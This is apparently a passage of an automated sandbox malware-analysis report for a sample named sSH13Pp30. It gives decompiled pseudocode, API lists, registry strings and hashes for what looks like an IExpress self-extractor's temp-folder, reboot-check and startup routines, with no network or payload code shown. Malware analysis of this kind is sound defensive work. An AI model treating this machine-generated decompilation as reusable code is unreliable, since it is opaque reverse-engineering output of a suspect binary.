                                                                                                                                                                                                      • Instruction ID: c3f4e050091d6338c86ba8f53bef3ec28a7dd46bcdc203155462be6ee8286d55
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d4dd0d71d06a4f7193cf99c4215b7674d26c5af521d2262887fd0de5704b3f18
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 781108713005846BE7209B379C89FEF366DDBC6B26F000425B646F61D1CE789D828661
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                      			E000E5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t10;
                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                      				intOrPtr _t14;
                                                                                                                                                                                                      				void* _t16;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				signed int _t26;
                                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                                      				CHAR* _t48;
                                                                                                                                                                                                      				signed int _t49;
                                                                                                                                                                                                      				intOrPtr _t61;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t10 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				if(__edx == 0) {
                                                                                                                                                                                                      					_t48 = 0xe91e4;
                                                                                                                                                                                                      					_t42 = 0x104;
                                                                                                                                                                                                      					E000E1680(0xe91e4, 0x104);
                                                                                                                                                                                                      					L14:
                                                                                                                                                                                                      					_t13 = E000E58C8(_t48); // executed
                                                                                                                                                                                                      					if(_t13 != 0) {
                                                                                                                                                                                                      						L17:
                                                                                                                                                                                                      						_t42 = _a4;
                                                                                                                                                                                                      						if(_a4 == 0) {
                                                                                                                                                                                                      							L23:
                                                                                                                                                                                                      							 *0xe9124 = 0;
                                                                                                                                                                                                      							_t14 = 1;
                                                                                                                                                                                                      							L24:
                                                                                                                                                                                                      							return E000E6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t16 = E000E597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                      						if(_t16 != 0) {
                                                                                                                                                                                                      							goto L23;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t61 =  *0xe8a20; // 0x0
                                                                                                                                                                                                      						if(_t61 != 0) {
                                                                                                                                                                                                      							 *0xe8a20 = 0;
                                                                                                                                                                                                      							RemoveDirectoryA(_t48);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L22:
                                                                                                                                                                                                      						_t14 = 0;
                                                                                                                                                                                                      						goto L24;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                      						 *0xe9124 = E000E6285();
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *0xe8a20 = 1;
                                                                                                                                                                                                      					goto L17;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t42 =  &_v268;
                                                                                                                                                                                                      				_t20 = E000E53A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                      				if(_t20 == 0) {
                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_t48 = 0xe91e4;
                                                                                                                                                                                                      				E000E1781(0xe91e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                      				if(( *0xe9a34 & 0x00000020) == 0) {
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					_t42 = 0x104;
                                                                                                                                                                                                      					E000E658A(_t48, 0x104, 0xe1140);
                                                                                                                                                                                                      					goto L14;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				GetSystemInfo( &_v304);
                                                                                                                                                                                                      				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                      				if(_t26 == 0) {
                                                                                                                                                                                                      					_push("i386");
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					E000E658A(_t48, 0x104);
                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t28 = _t26 - 1;
                                                                                                                                                                                                      				if(_t28 == 0) {
                                                                                                                                                                                                      					_push("mips");
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t29 = _t28 - 1;
                                                                                                                                                                                                      				if(_t29 == 0) {
                                                                                                                                                                                                      					_push("alpha");
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t29 != 1) {
                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push("ppc");
                                                                                                                                                                                                      				goto L11;
                                                                                                                                                                                                      			}





















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E54C9
                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E553D
                                                                                                                                                                                                      • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E556F
                                                                                                                                                                                                        • Part of subcall function 000E53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E53FB
                                                                                                                                                                                                        • Part of subcall function 000E53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E5402
                                                                                                                                                                                                        • Part of subcall function 000E53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E541F
                                                                                                                                                                                                        • Part of subcall function 000E53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E542B
                                                                                                                                                                                                        • Part of subcall function 000E53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E5434
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                      • API String ID: 1979080616-3388087672
                                                                                                                                                                                                      • Opcode ID: fe067875be6869b315c767c5673ba21b13486d4de61875dd093f88fbe6cf9994
                                                                                                                                                                                                      • Instruction ID: dad5d8fac2b4c9a5fcf39ee9273321e70ab72882f7c272e93eff8ce0f2479792
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe067875be6869b315c767c5673ba21b13486d4de61875dd093f88fbe6cf9994
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9316972B00EC05FDB249B379C945FE73EAAB8174AB04087AE502F7291CB74CF018691
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 563 e256d-e257d 564 e2622-e2627 call e24e0 563->564 565 e2583-e2589 563->565 572 e2629-e262f 564->572 567 e258b 565->567 568 e25e8-e2607 RegOpenKeyExA 565->568 567->572 573 e2591-e2595 567->573 569 e2609-e2620 RegQueryInfoKeyA 568->569 570 e25e3-e25e6 568->570 574 e25d1-e25dd RegCloseKey 569->574 570->572 573->572 575 e259b-e25ba RegOpenKeyExA 573->575 574->570 575->570 576 e25bc-e25cb RegQueryValueExA 575->576 576->574
                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E000E256D(signed int __ecx) {
                                                                                                                                                                                                      				int _v8;
                                                                                                                                                                                                      				void* _v12;
                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                                      				long _t24;
                                                                                                                                                                                                      				void* _t26;
                                                                                                                                                                                                      				int _t31;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                      				_t31 = 0;
                                                                                                                                                                                                      				if(_t13 == 0) {
                                                                                                                                                                                                      					_t31 = E000E24E0(_t26);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t34 = _t13 - 1;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						_v8 = 0;
                                                                                                                                                                                                      						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                      							goto L7;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                      							goto L6;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L12:
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                      							_v8 = 0;
                                                                                                                                                                                                      							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                      							if(_t24 == 0) {
                                                                                                                                                                                                      								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                      								L6:
                                                                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                                                                      								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                      								RegCloseKey(_v12); // executed
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							L7:
                                                                                                                                                                                                      							_t31 = _v8;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t31;
                                                                                                                                                                                                      				goto L12;
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,000E4096,000E4096,?,000E1ED3,00000001,00000000,?,?,000E4137,?), ref: 000E25B2
                                                                                                                                                                                                      • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,000E4096,?,000E1ED3,00000001,00000000,?,?,000E4137,?,000E4096), ref: 000E25CB
                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,000E1ED3,00000001,00000000,?,?,000E4137,?,000E4096), ref: 000E25DD
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,000E4096,000E4096,?,000E1ED3,00000001,00000000,?,?,000E4137,?), ref: 000E25FF
                                                                                                                                                                                                      • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,000E4096,00000000,00000000,00000000,00000000,?,000E1ED3,00000001,00000000), ref: 000E261A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • PendingFileRenameOperations, xrefs: 000E25C3
                                                                                                                                                                                                      • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 000E25F5
                                                                                                                                                                                                      • System\CurrentControlSet\Control\Session Manager, xrefs: 000E25A8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                      • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                      • API String ID: 2209512893-559176071
                                                                                                                                                                                                      • Opcode ID: 6f854575b85b8a6295e3eb9b9c6dd302a695682e9a1d2dcfe51cb96c8dc04463
                                                                                                                                                                                                      • Instruction ID: 8486df29e2e00e42cfb7d05c7948d10a37964d2d009b1e5504275a2a0e4f9e7e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f854575b85b8a6295e3eb9b9c6dd302a695682e9a1d2dcfe51cb96c8dc04463
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5116D36A022A8FFEB20DB929C49DFFBEACEB067A1F114155B908B2011D6705A44D6A1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 577 e6a60-e6a91 call e7155 call e7208 GetStartupInfoW 583 e6a93-e6aa2 577->583 584 e6abc-e6abe 583->584 585 e6aa4-e6aa6 583->585 588 e6abf-e6ac5 584->588 586 e6aaf-e6aba Sleep 585->586 587 e6aa8-e6aad 585->587 586->583 587->588 589 e6ac7-e6acf _amsg_exit 588->589 590 e6ad1-e6ad7 588->590 591 e6b0b-e6b11 589->591 592 e6ad9-e6ae9 call e6c3f 590->592 593 e6b05 590->593 595 e6b2e-e6b30 591->595 596 e6b13-e6b24 _initterm 591->596 597 e6aee-e6af2 592->597 593->591 598 e6b3b-e6b42 595->598 599 e6b32-e6b39 595->599 596->595 597->591 602 e6af4-e6b00 597->602 600 e6b67-e6b71 598->600 601 e6b44-e6b51 call e7060 598->601 599->598 604 e6b74-e6b79 600->604 601->600 610 e6b53-e6b65 601->610 605 e6c39-e6c3e call e724d 602->605 608 e6b7b-e6b7d 604->608 609 e6bc5-e6bc8 604->609 614 e6b7f-e6b81 608->614 615 e6b94-e6b98 608->615 611 e6bca-e6bd3 609->611 612 e6bd6-e6be3 _ismbblead 609->612 610->600 611->612 616 e6be9-e6bed 612->616 617 e6be5-e6be6 612->617 614->609 618 e6b83-e6b85 614->618 619 e6b9a-e6b9e 615->619 620 e6ba0-e6ba2 615->620 616->604 623 e6c1e-e6c25 616->623 617->616 618->615 624 e6b87-e6b8a 618->624 621 e6ba3-e6bbc call e2bfb 619->621 620->621 621->623 630 e6bbe-e6bbf exit 621->630 626 e6c27-e6c2d _cexit 623->626 627 e6c32 623->627 624->615 628 e6b8c-e6b92 624->628 626->627 627->605 628->618 630->609
                                                                                                                                                                                                      C-Code - Quality: 51%
                                                                                                                                                                                                      			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                      				signed int* _t25;
                                                                                                                                                                                                      				signed int _t26;
                                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				signed int _t37;
                                                                                                                                                                                                      				signed char _t41;
                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                      				signed int _t54;
                                                                                                                                                                                                      				intOrPtr _t56;
                                                                                                                                                                                                      				signed int _t58;
                                                                                                                                                                                                      				signed int _t59;
                                                                                                                                                                                                      				intOrPtr* _t60;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				void* _t67;
                                                                                                                                                                                                      				void* _t68;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				E000E7155();
                                                                                                                                                                                                      				_push(0x58);
                                                                                                                                                                                                      				_push(0xe72b8);
                                                                                                                                                                                                      				E000E7208(__ebx, __edi, __esi);
                                                                                                                                                                                                      				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                      				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                      				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                      				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                      				_t53 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                      					if(0 == 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(0 != _t56) {
                                                                                                                                                                                                      						Sleep(0x3e8);
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t58 = 1;
                                                                                                                                                                                                      						_t53 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L7:
                                                                                                                                                                                                      					_t67 =  *0xe88b0 - _t58; // 0x2
                                                                                                                                                                                                      					if(_t67 != 0) {
                                                                                                                                                                                                      						__eflags =  *0xe88b0; // 0x2
                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                      							 *0xe81e4 = _t58;
                                                                                                                                                                                                      							goto L13;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							 *0xe88b0 = _t58;
                                                                                                                                                                                                      							_t37 = E000E6C3F(0xe10b8, 0xe10c4); // executed
                                                                                                                                                                                                      							__eflags = _t37;
                                                                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                                                                      								goto L13;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                      								_t30 = 0xff;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_push(0x1f);
                                                                                                                                                                                                      						L000E6FF4();
                                                                                                                                                                                                      						L13:
                                                                                                                                                                                                      						_t68 =  *0xe88b0 - _t58; // 0x2
                                                                                                                                                                                                      						if(_t68 == 0) {
                                                                                                                                                                                                      							_push(0xe10b4);
                                                                                                                                                                                                      							_push(0xe10ac);
                                                                                                                                                                                                      							L000E7202();
                                                                                                                                                                                                      							 *0xe88b0 = 2;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if(_t53 == 0) {
                                                                                                                                                                                                      							 *0xe88ac = 0;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t71 =  *0xe88b4;
                                                                                                                                                                                                      						if( *0xe88b4 != 0 && E000E7060(_t71, 0xe88b4) != 0) {
                                                                                                                                                                                                      							_t60 =  *0xe88b4; // 0x0
                                                                                                                                                                                                      							 *0xea288(0, 2, 0);
                                                                                                                                                                                                      							 *_t60();
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t25 = __imp___acmdln; // 0x76665b9c
                                                                                                                                                                                                      						_t59 =  *_t25;
                                                                                                                                                                                                      						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                      							_t41 =  *_t59;
                                                                                                                                                                                                      							if(_t41 > 0x20) {
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							if(_t41 != 0) {
                                                                                                                                                                                                      								if(_t54 != 0) {
                                                                                                                                                                                                      									goto L32;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                      										_t59 = _t59 + 1;
                                                                                                                                                                                                      										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      										_t41 =  *_t59;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                      							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                      								_t29 = 0xa;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push(_t29);
                                                                                                                                                                                                      							_t30 = E000E2BFB(0xe0000, 0, _t59); // executed
                                                                                                                                                                                                      							 *0xe81e0 = _t30;
                                                                                                                                                                                                      							__eflags =  *0xe81f8;
                                                                                                                                                                                                      							if( *0xe81f8 == 0) {
                                                                                                                                                                                                      								exit(_t30); // executed
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags =  *0xe81e4;
                                                                                                                                                                                                      							if( *0xe81e4 == 0) {
                                                                                                                                                                                                      								__imp___cexit();
                                                                                                                                                                                                      								_t30 =  *0xe81e0; // 0x80070002
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                      							goto L40;
                                                                                                                                                                                                      							L32:
                                                                                                                                                                                                      							__eflags = _t41 - 0x22;
                                                                                                                                                                                                      							if(_t41 == 0x22) {
                                                                                                                                                                                                      								__eflags = _t54;
                                                                                                                                                                                                      								_t15 = _t54 == 0;
                                                                                                                                                                                                      								__eflags = _t15;
                                                                                                                                                                                                      								_t54 = 0 | _t15;
                                                                                                                                                                                                      								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                      							__imp___ismbblead(_t26);
                                                                                                                                                                                                      							__eflags = _t26;
                                                                                                                                                                                                      							if(_t26 != 0) {
                                                                                                                                                                                                      								_t59 = _t59 + 1;
                                                                                                                                                                                                      								__eflags = _t59;
                                                                                                                                                                                                      								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t59 = _t59 + 1;
                                                                                                                                                                                                      							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L40:
                                                                                                                                                                                                      					return E000E724D(_t30);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t58 = 1;
                                                                                                                                                                                                      				__eflags = 1;
                                                                                                                                                                                                      				goto L7;
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      0x000e6ae9
                                                                                                                                                                                                      0x000e6af0
                                                                                                                                                                                                      0x000e6af2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e6af4
                                                                                                                                                                                                      0x000e6af4
                                                                                                                                                                                                      0x000e6afb
                                                                                                                                                                                                      0x000e6afb
                                                                                                                                                                                                      0x000e6af2
                                                                                                                                                                                                      0x000e6ac7
                                                                                                                                                                                                      0x000e6ac7
                                                                                                                                                                                                      0x000e6ac9
                                                                                                                                                                                                      0x000e6b0b
                                                                                                                                                                                                      0x000e6b0b
                                                                                                                                                                                                      0x000e6b11
                                                                                                                                                                                                      0x000e6b13
                                                                                                                                                                                                      0x000e6b18
                                                                                                                                                                                                      0x000e6b1d
                                                                                                                                                                                                      0x000e6b24
                                                                                                                                                                                                      0x000e6b24
                                                                                                                                                                                                      0x000e6b30
                                                                                                                                                                                                      0x000e6b39
                                                                                                                                                                                                      0x000e6b39
                                                                                                                                                                                                      0x000e6b3b
                                                                                                                                                                                                      0x000e6b42
                                                                                                                                                                                                      0x000e6b57
                                                                                                                                                                                                      0x000e6b5f
                                                                                                                                                                                                      0x000e6b65
                                                                                                                                                                                                      0x000e6b65
                                                                                                                                                                                                      0x000e6b67
                                                                                                                                                                                                      0x000e6b6c
                                                                                                                                                                                                      0x000e6b6e
                                                                                                                                                                                                      0x000e6b71
                                                                                                                                                                                                      0x000e6b74
                                                                                                                                                                                                      0x000e6b74
                                                                                                                                                                                                      0x000e6b79
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e6b7d
                                                                                                                                                                                                      0x000e6b81
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e6b83
                                                                                                                                                                                                      0x000e6b8c
                                                                                                                                                                                                      0x000e6b8d
                                                                                                                                                                                                      0x000e6b90
                                                                                                                                                                                                      0x000e6b90
                                                                                                                                                                                                      0x000e6b83
                                                                                                                                                                                                      0x000e6b81
                                                                                                                                                                                                      0x000e6b94
                                                                                                                                                                                                      0x000e6b98
                                                                                                                                                                                                      0x000e6ba2
                                                                                                                                                                                                      0x000e6b9a
                                                                                                                                                                                                      0x000e6b9a
                                                                                                                                                                                                      0x000e6b9a
                                                                                                                                                                                                      0x000e6ba3
                                                                                                                                                                                                      0x000e6bab
                                                                                                                                                                                                      0x000e6bb0
                                                                                                                                                                                                      0x000e6bb5
                                                                                                                                                                                                      0x000e6bbc
                                                                                                                                                                                                      0x000e6bbf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e6bbf
                                                                                                                                                                                                      0x000e6c1e
                                                                                                                                                                                                      0x000e6c25
                                                                                                                                                                                                      0x000e6c27
                                                                                                                                                                                                      0x000e6c2d
                                                                                                                                                                                                      0x000e6c2d
                                                                                                                                                                                                      0x000e6c32
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e6bc5
                                                                                                                                                                                                      0x000e6bc5
                                                                                                                                                                                                      0x000e6bc8
                                                                                                                                                                                                      0x000e6bcc
                                                                                                                                                                                                      0x000e6bce
                                                                                                                                                                                                      0x000e6bce
                                                                                                                                                                                                      0x000e6bd1
                                                                                                                                                                                                      0x000e6bd3
                                                                                                                                                                                                      0x000e6bd3
                                                                                                                                                                                                      0x000e6bd6
                                                                                                                                                                                                      0x000e6bda
                                                                                                                                                                                                      0x000e6be1
                                                                                                                                                                                                      0x000e6be3
                                                                                                                                                                                                      0x000e6be5
                                                                                                                                                                                                      0x000e6be5
                                                                                                                                                                                                      0x000e6be6
                                                                                                                                                                                                      0x000e6be6
                                                                                                                                                                                                      0x000e6be9
                                                                                                                                                                                                      0x000e6bea
                                                                                                                                                                                                      0x000e6bea
                                                                                                                                                                                                      0x000e6b74
                                                                                                                                                                                                      0x000e6c39
                                                                                                                                                                                                      0x000e6c3e
                                                                                                                                                                                                      0x000e6c3e
                                                                                                                                                                                                      0x000e6abe
                                                                                                                                                                                                      0x000e6abe
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 000E7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 000E7182
                                                                                                                                                                                                        • Part of subcall function 000E7155: GetCurrentProcessId.KERNEL32 ref: 000E7191
                                                                                                                                                                                                        • Part of subcall function 000E7155: GetCurrentThreadId.KERNEL32 ref: 000E719A
                                                                                                                                                                                                        • Part of subcall function 000E7155: GetTickCount.KERNEL32 ref: 000E71A3
                                                                                                                                                                                                        • Part of subcall function 000E7155: QueryPerformanceCounter.KERNEL32(?), ref: 000E71B8
                                                                                                                                                                                                      • GetStartupInfoW.KERNEL32(?,000E72B8,00000058), ref: 000E6A7F
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 000E6AB4
                                                                                                                                                                                                      • _amsg_exit.MSVCRT ref: 000E6AC9
                                                                                                                                                                                                      • _initterm.MSVCRT ref: 000E6B1D
                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 000E6B49
                                                                                                                                                                                                      • exit.KERNELBASE ref: 000E6BBF
                                                                                                                                                                                                      • _ismbblead.MSVCRT ref: 000E6BDA
